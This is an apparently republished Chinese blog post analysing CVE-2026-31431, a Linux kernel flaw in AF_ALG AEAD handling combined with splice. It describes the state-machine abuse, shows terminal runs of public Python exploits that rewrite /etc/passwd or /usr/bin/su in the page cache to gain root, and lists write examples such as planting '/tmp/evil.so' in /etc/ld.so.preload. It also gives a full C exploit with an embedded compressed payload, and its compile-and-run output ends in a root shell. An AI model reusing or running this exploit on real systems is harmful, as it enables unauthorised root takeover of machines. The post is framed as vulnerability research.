当前位置:首页>Linux>最新通杀全线Linux发行版的CVE漏洞解析

最新通杀全线Linux发行版的CVE漏洞解析

  • 2026-06-28 18:48:13
最新通杀全线Linux发行版的CVE漏洞解析

最新通杀全线Linux发行版的CVE漏洞解析

昨天出了一个新洞:CVE-2026-31431,这个洞太猛了,号称不借助任何外部的工具,可以LPE揽权获取最高权限干翻现在多数的Linux发行版本。

今天我试了下Ubuntu22.04与Ubuntu24.04,在打完了最新的补丁的情况下,稳定的本地揽权成功!太强了,看看是什么原理。

背景

CVE-2026-31431 是一个典型的内核逻辑漏洞,影响范围涵盖了几乎所有主流 Linux 发行版。其核心问题在于 crypto/algif_aead.c 中的状态机处理不当:

  1. AF_ALG 滥用
    :通过 setsockopt 反复切换加密状态。
  2. Splice 零拷贝原语
    :利用 splice 系统调用将 /usr/bin/su 等敏感文件的 Page Cache 映射到加密流中。
  3. 状态机竞争
    :通过特定的 sendmsg 辅助消息(Control Message)在内核处理加密请求时强行插入新的密钥操作,导致内核在执行 zero-copy 传输时将受控的 Payload 错误地覆盖到原始文件的缓存页中。

公开的POC代码是python脚本。仓库地址是:https://github.com/rootsecdev/cve_2026_31431

原理分析

这个POC的核心功能是AF_ALG状态机劫持。AF_ALG 允许用户态程序通过 Socket 接口调用内核加密算法。为了提升性能,内核实现了 splice 接口,允许数据在两个文件描述符(如普通文件与加密 Socket)之间直接传输而无需拷贝。

漏洞的精妙之处在于:当内核认为它正在将数据读入加密引擎时,我们通过篡改 Socket 的状态机,让内核误以为当前操作已结束并进入“解密写回”阶段。此时,原本应被读取的 Page Cache 会被内核以“解密结果”的形式覆写。

比较有意思的是,我在自己的macOS上的虚拟机Ubuntu22.04的5.15 内核上测试失败了!

ubuntu@ubuntu:~/Downloads$ cd cve_2026_31431/ubuntu@ubuntu:~/Downloads/cve_2026_31431$ python3 a.out                      exploit_cve_2026_31431.py  README.mdexp.c                      .git/                      test_cve_2026_31431.pyubuntu@ubuntu:~/Downloads/cve_2026_31431$ python3 exploit_cve_2026_31431.py [*] CVE-2026-31431 LPE  user=ubuntu  uid=1000[*] /etc/passwd: ubuntu UID field at offset 1335 = '1000'[*] Patching '1000' -> '0000'in page cache...[*] Page cache now reads b'0000' at offset 1335[*] getpwnam('ubuntu').pw_uid = 0[+] /etc/passwd page cache now lists ubuntu as UID 0.[+] Run:   su ubuntu[+] Enter your own password. su will setuid(0) and drop a root shell.[i] Cleanup after testing (from the root shell):[i]   echo 3 > /proc/sys/vm/drop_caches[i] /etc/passwd page cache evicted (POSIX_FADV_DONTNEED). UID->name lookups restored.ubuntu@ubuntu:~/Downloads/cve_2026_31431$ 

这个版本的Exploit执行后会失败!然后发现网上有一个高级版本的POC代码。仓库地址是:https://github.com/Sndav/CVE-2026-31431-Advanced-Exploit

试了一下,干成功了!

ubuntu@ubuntu:~/Downloads/CVE-2026-31431-Advanced-Exploit$ python3 exploit.py Usage:  exploit.py escalate                        \u2014 patch /etc/passwd, set current user to uid=0  exploit.py write <file> <offset> <data>    \u2014 arbitrary page-cache write  file    \u2014 path to any readable file  offset  \u2014 byte offset (decimal or 0x hex)  data    \u2014 data to write (string, or @filename to read from file)Examples:  exploit.py escalate  exploit.py write /usr/bin/su 0x1040 @shellcode.bin  exploit.py write /etc/ld.so.preload 0 '/tmp/evil.so\n'  exploit.py write /usr/lib/libc.so.6 0x284a0 '\x31\xc0\xc3\x90'ubuntu@ubuntu:~/Downloads/CVE-2026-31431-Advanced-Exploit$ python3 exploit.py escalate[*] CVE-2026-31431 \u2014 Copy Fail[*] Mode: remove root password via /etc/passwd[*] Backup: /tmp/.passwd.bak[*] Before : root:x:0:0:root:/root:/bin/bash[*] After  : root::0:0:root :/root:/bin/bash[*] Offset : 0    [0x000000]  726f6f74  root    [0x000004]  3a3a303a  ::0:    [0x000008]  303a726f  0:ro    [0x00000c]  6f74203a  ot :    [0x000010]  2f726f6f  /roo    [0x000014]  743a2f62  t:/b    [0x000018]  696e2f62  in/b    [0x00001c]  6173680a  ash.[+] Success: root::0:0:root :/root:/bin/bash[*] Recovery: echo 3 > /proc/sys/vm/drop_caches[*] Running: su root (no password needed)root@ubuntu:/home/ubuntu/Downloads/CVE-2026-31431-Advanced-Exploit

高级版 Exploit 引入了两个关键改进:

  • NULL 指针状态触发
    :通过 setsockopt(..., NULL, 4) 强行让内部句柄进入异常状态。
  • 三阶段辅助消息
    :在 sendmsg 中构造精密的辅助数据区(Control Data),模拟加密上下文。
阶段
目的
阶段 1
重置 AEAD 状态机,使其处于待处理状态 (Operation Type 3)
阶段 2
注入虚假状态,接管内核栈中的偏移量 (Operation Type 2)
阶段 3
锁定篡改路径,触发 Page Cache 覆写 (Operation Type 4)

将状态注入与 splice 结合,完整的提权链路如下:

  1. 打开目标只读文件(如 /usr/bin/su)。
  2. 创建 AF_ALG 类型的 AEAD Socket。
  3. 通过 setsockopt 和 sendmsg 注入高级版 Exploit 的状态载荷。
  4. 利用 splice 将文件内容拉入管道,再从管道推入加密流。
  5. 由于状态机已被劫持,内核会将管道中的数据作为“解密结果”写回到文件的 Page Cache 中。
  6. 执行已在内存中被篡改的 su 进程。

从原理上可以看出,这个洞对于安卓系统来说没有什么影响,发行版本的安卓设备不会有su,自然也是没有影响的。

最后,我弄了一个C语言版本的,代码如下:

/** * CVE-2026-31431 Universal Exploit (Advanced Version) * Compile: cc exp.c -lz -o exp */#define _GNU_SOURCE#include<stdio.h>#include<stdlib.h>#include<string.h>#include<unistd.h>#include<fcntl.h>#include<errno.h>#include<sys/socket.h>#include<sys/types.h>#include<sys/syscall.h>#include<linux/if_alg.h>#include<zlib.h>#ifndef SPLICE_F_MOVE#define SPLICE_F_MOVE 1#endif// 直接使用 syscall 避免不同发行版头文件差异staticssize_tmy_splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsignedint flags) {return syscall(__NR_splice, fd_in, off_in, fd_out, off_out, len, flags);}// 辅助函数:十六进制 Payload 转换unsignedcharhex_to_bytes(constchar* hex, size_t* out_len) {size_t len = strlen(hex);if (len % 2 != 0returnNULL;    *out_len = len / 2;unsignedchar* bytes = malloc(*out_len);for (size_t i = 0; i < *out_len; i++) {if (sscanf(hex + 2*i, "%2hhx", &bytes[i]) != 1) {free(bytes);returnNULL;        }    }return bytes;}// 触发漏洞的核心函数voidtrigger_exploit(int su_file_fd, int payload_offset, constunsignedchar* payload_chunk) {int alg_socket = socket(AF_ALG, SOCK_SEQPACKET, 0);if (alg_socket < 0return;structsockaddr_algsa = {        .salg_family = AF_ALG,        .salg_type = "aead",        .salg_name = "authencesn(hmac(sha256),cbc(aes))"    };if (bind(alg_socket, (struct sockaddr*)&sa, sizeof(sa)) < 0) {        close(alg_socket);return;    }// 设置初始密钥size_t key_len;unsignedchar* key = hex_to_bytes("08000100000000100000000000000000000000000000000000000000000000000000000000000000", &key_len);    setsockopt(alg_socket, SOL_ALG, ALG_SET_KEY, key, key_len);free(key);    syscall(__NR_setsockopt, alg_socket, SOL_ALG, ALG_SET_KEY, NULL4);int encrypted_stream = accept(alg_socket, NULLNULL);if (encrypted_stream < 0) {        close(alg_socket);return;    }// 构造高级版 sendmsg 载荷structmsghdrmsg = {0};structioveciov;unsignedchar msg_data[8];memcpy(msg_data, "AAAA"4);memcpy(msg_data + 4, payload_chunk, 4);    iov.iov_base = msg_data;    iov.iov_len = 8;    msg.msg_iov = &iov;    msg.msg_iovlen = 1;// 分配足够的控制消息空间char ctrl_buf[CMSG_SPACE(32) * 3];memset(ctrl_buf, 0sizeof(ctrl_buf));    msg.msg_control = ctrl_buf;    msg.msg_controllen = sizeof(ctrl_buf);structcmsghdr *cmsg;// 阶段 1: 重置状态机 (Type 3)    cmsg = CMSG_FIRSTHDR(&msg);    cmsg->cmsg_level = SOL_ALG;    cmsg->cmsg_type = ALG_SET_KEY;    cmsg->cmsg_len = CMSG_LEN(4);    ((int*)CMSG_DATA(cmsg))[0] = 3// 阶段 2: 注入偏移量 (Type 2, 20 bytes)    cmsg = CMSG_NXTHDR(&msg, cmsg);if (cmsg) {        cmsg->cmsg_level = SOL_ALG;        cmsg->cmsg_type = ALG_SET_KEY;        cmsg->cmsg_len = CMSG_LEN(20);        CMSG_DATA(cmsg)[0] = 0x10;        ((int*)CMSG_DATA(cmsg))[0] = 2;    }// 阶段 3: 锁定路径 (Type 4)    cmsg = CMSG_NXTHDR(&msg, cmsg);if (cmsg) {        cmsg->cmsg_level = SOL_ALG;        cmsg->cmsg_type = ALG_SET_KEY;        cmsg->cmsg_len = CMSG_LEN(4);        CMSG_DATA(cmsg)[0] = 0x08;        ((int*)CMSG_DATA(cmsg))[0] = 4;    }    sendmsg(encrypted_stream, &msg, 0);// Splice 零拷贝原语实现覆写int pipefd[2];if (pipe(pipefd) == 0) {// 将 su 文件内容拉入管道        my_splice(su_file_fd, NULL, pipefd[1], NULL, payload_offset + 4, SPLICE_F_MOVE);// 将管道内容推入加密流,由于状态机被劫持,此处会覆写 Page Cache        my_splice(pipefd[0], NULL, encrypted_stream, NULL, payload_offset + 4, SPLICE_F_MOVE);        close(pipefd[0]);        close(pipefd[1]);    }// 修复点:不再使用大长度 recv,避免栈溢出char dummy[64];    recv(encrypted_stream, dummy, sizeof(dummy), MSG_DONTWAIT);    close(encrypted_stream);    close(alg_socket);}intmain() {constchar* su_path = "/usr/bin/su";int fd = open(su_path, O_RDONLY);if (fd < 0) {        perror("[-] Failed to open su");return1;    }printf("[*] CVE-2026-31431 Advanced Exploit starting...\n");printf("[*] Targeted: Ubuntu 22.04 (Kernel 5.15+)\n");constchar* payload_hex = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3";size_t compressed_len;unsignedchar* compressed = hex_to_bytes(payload_hex, &compressed_len);    uLongf payload_len = 4096// 增加解压缓冲区unsignedchar* payload = malloc(payload_len);if (uncompress(payload, &payload_len, compressed, compressed_len) != Z_OK) {fprintf(stderr"[-] Decompression failed\n");return1;    }free(compressed);printf("[*] Triggering Page Cache corruption (len: %lu)...\n", payload_len);for (size_t offset = 0; offset < payload_len; offset += 4) {        trigger_exploit(fd, offset, payload + offset);    }free(payload);    close(fd);printf("[+] Exploit finished. Attempting to get root shell...\n");    execl(su_path, "su"NULL);return0;}

编译测试:

ubuntu@ubuntu:~/Downloads/CVE-2026-31431-Advanced-Exploit$ cc exp.c -l zubuntu@ubuntu:~/Downloads/CVE-2026-31431-Advanced-Exploit$ ./a.out [*] CVE-2026-31431 Advanced Exploit starting...[*] Targeted: Ubuntu 22.04 (Kernel 5.15+)[*] Triggering Page Cache corruption (len: 160)...[+] Exploit finished. Attempting to get root shell...root@ubuntu:/home/ubuntu/Downloads/CVE-2026-31431-Advanced-Exploit#

希望本篇分析能为您的漏洞研究提供有价值的参考。

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-07-03 22:57:31 HTTP/2.0 GET : https://f.mffb.com.cn/a/490537.html
  2. 运行时间 : 0.455946s [ 吞吐率:2.19req/s ] 内存消耗:4,676.41kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=9ab0cb56e22e951117defed93a64b73f
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000840s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.001835s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.023961s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.011606s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.001932s ]
